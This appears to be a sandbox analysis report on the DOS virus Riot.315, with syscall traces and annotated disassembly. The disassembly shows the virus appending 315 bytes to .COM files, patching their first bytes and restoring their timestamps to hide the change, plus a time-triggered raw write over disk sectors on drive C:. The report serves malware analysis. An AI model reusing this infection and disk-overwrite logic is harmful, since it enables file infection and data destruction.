Sample viewer

vx.netlux.org/Virus.DOS.Riot.315


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:09:48.005789032Z 26 PC: 12a85 | Set disk transfer address
2018-12-17T22:09:48.007651109Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.016870254Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-17T22:09:48.023814482Z 78 PC: 12a94 | Find first file
2018-12-17T22:09:48.030732077Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.047107877Z 61 PC: 12acb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:09:48.053867704Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.057003454Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.063104085Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-17T22:09:48.064260351Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-17T22:09:48.06596492Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.072338027Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.07343925Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.077518475Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.079400599Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.084209828Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.086063016Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.092829298Z 61 PC: 12acb | Open file (Filename = 'PRINT.COM')
2018-12-17T22:09:48.096908333Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.09803859Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.10260373Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-17T22:09:48.104015676Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-17T22:09:48.105617456Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.11098832Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.112029471Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.113749194Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.115361566Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.120117102Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.121973796Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.13115622Z 61 PC: 12acb | Open file (Filename = 'HELLO.COM')
2018-12-17T22:09:48.13862606Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.140188097Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.144390469Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-17T22:09:48.145915652Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-17T22:09:48.147644415Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.149877909Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.151535974Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.153453081Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.155535151Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.160424229Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.162351889Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.168460334Z 61 PC: 12acb | Open file (Filename = 'PHANG.COM')
2018-12-17T22:09:48.173276839Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.174427973Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.178429043Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-17T22:09:48.180019362Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-17T22:09:48.18153001Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.183417361Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.184948237Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.187337838Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.189057668Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.197382411Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.200394355Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.21323154Z 61 PC: 12acb | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:09:48.221152417Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.222863909Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.229276823Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-17T22:09:48.231761493Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-17T22:09:48.23431909Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.237424043Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.23975958Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.24263113Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.24435513Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.252903557Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.255658039Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.265622074Z 61 PC: 12acb | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:09:48.27335451Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.275134255Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.281422837Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-17T22:09:48.284452409Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-17T22:09:48.286910607Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.295311936Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.297891444Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.305188715Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.30713333Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.316148504Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.319173915Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.329019968Z 61 PC: 12acb | Open file (Filename = 'PAH.COM')
2018-12-17T22:09:48.335659661Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.338049152Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.3444693Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-17T22:09:48.346004231Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-17T22:09:48.349215327Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.352199067Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.353529854Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.357941204Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.35967363Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.367406514Z 79 PC: 12a94 | Find next file
2018-12-17T22:09:48.371265721Z 67 PC: 12ac6 | Get or set file attributes
2018-12-17T22:09:48.381042854Z 61 PC: 12acb | Open file (Filename = 'TEST.COM')
2018-12-17T22:09:48.388196637Z 87 PC: 12ad3 | Get or set file date and time
2018-12-17T22:09:48.391012868Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:09:48.397357166Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-17T22:09:48.398718386Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-17T22:09:48.40235219Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-17T22:09:48.410485905Z 66 PC: 12b0d | Move file pointer
2018-12-17T22:09:48.41216469Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:09:48.419534665Z 87 PC: 12b1f | Get or set file date and time
2018-12-17T22:09:48.421252855Z 62 PC: 12b23 | Close file
2018-12-17T22:09:48.42962116Z 79 PC: 12a94 | Find next file
; Excerpt: time-gated absolute disk write, then the jump back to offset 0x100, followed
; by the start of the routine that clears a file's attributes and opens it read/write.
; NOTE(review): the trace shows no entry between Get time and Set disk transfer address;
; confirm whether the sandbox records int 0x26 at all before concluding the write did not run.
2018-12-17T22:09:48.433000433Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2  ; dl = hundredths of a second returned by Get time
0x12aa4: ja 0x12aaf  ; dl > 2 (unsigned): skip the disk write
0x12aa6: mov al, 2  ; int 0x26 drive number: 2 = C:
0x12aa8: mov cx, 0x4d2  ; sector count: 0x4d2 = 1234
0x12aab: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx (start sector) = sign-extension of ax; ah is not set in this excerpt
0x12aac: int 0x26  ; DOS absolute disk write: raw sectors, bypassing the file system; buffer ds:bx is not set in this excerpt
0x12aae: popf  ; int 0x26 returns with the flags still on the stack; discard them
0x12aaf: mov dx, 0x80  ; offset 0x80 is the default DTA inside the PSP
0x12ab2: mov ah, 0x1a  ; AH=1Ah: set disk transfer address to ds:dx
0x12ab4: int 0x21  ; trace: "Set disk transfer address" (PC 12ab6)
0x12ab6: mov di, 0x100  ; 0x100 = entry offset of a .COM program
0x12ab9: push di
0x12aba: ret  ; push + ret = jump to offset 0x100, i.e. control passes to the program at the .COM entry
0x12abb: lea dx, word ptr [bp + 0x259]  ; separate routine starts here; dx = bp-relative buffer, presumably the file name - confirm
0x12abf: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12ac2: xor cx, cx  ; new attributes = 0 (clears read-only, hidden and system)
0x12ac4: int 0x21  ; trace: "Get or set file attributes" (PC 12ac6)
0x12ac6: mov ax, 0x3d02  ; AH=3Dh, AL=02h: open for read/write
0x12ac9: int 0x21  ; trace: "Open file" (PC 12acb)
0x12acb: jb 0x12b23  ; carry set = open failed: branch to 0x12b23, outside this excerpt
2018-12-17T22:09:48.435400954Z 26 PC: 12ab6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2213,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:08.842852689Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T11:45:08.844666759Z 67 PC: 12ac6 | Get or set file attributes
2018-12-25T11:45:08.853650781Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T11:45:08.860117609Z 78 PC: 12a94 | Find first file
2018-12-25T11:45:08.866956779Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:08.882443589Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:08.886486753Z 87 PC: 12ad3 | Get or set file date and time
2018-12-25T11:45:08.887605397Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:45:08.891804936Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-25T11:45:08.892774047Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-25T11:45:08.894183981Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-25T11:45:08.900683769Z 66 PC: 12b0d | Move file pointer
2018-12-25T11:45:08.902552126Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:45:08.909595279Z 87 PC: 12b1f | Get or set file date and time
2018-12-25T11:45:08.912352771Z 62 PC: 12b23 | Close file
2018-12-25T11:45:08.919899823Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:08.922705748Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:08.932729255Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:08.939154302Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:08.940344841Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:08.94725946Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:08.94873502Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:08.950860197Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:08.954724037Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:08.956019464Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:08.958465153Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:08.960027966Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:08.967564005Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:08.970197911Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:08.980040101Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:08.987383426Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:08.988670209Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:08.994871857Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:08.996561979Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:08.99914333Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.00222813Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.004875517Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.007643692Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.009380697Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.017967091Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.020573494Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.101936165Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.10905089Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.110677631Z 63 PC: 12ae0 | Read file or device (See above)
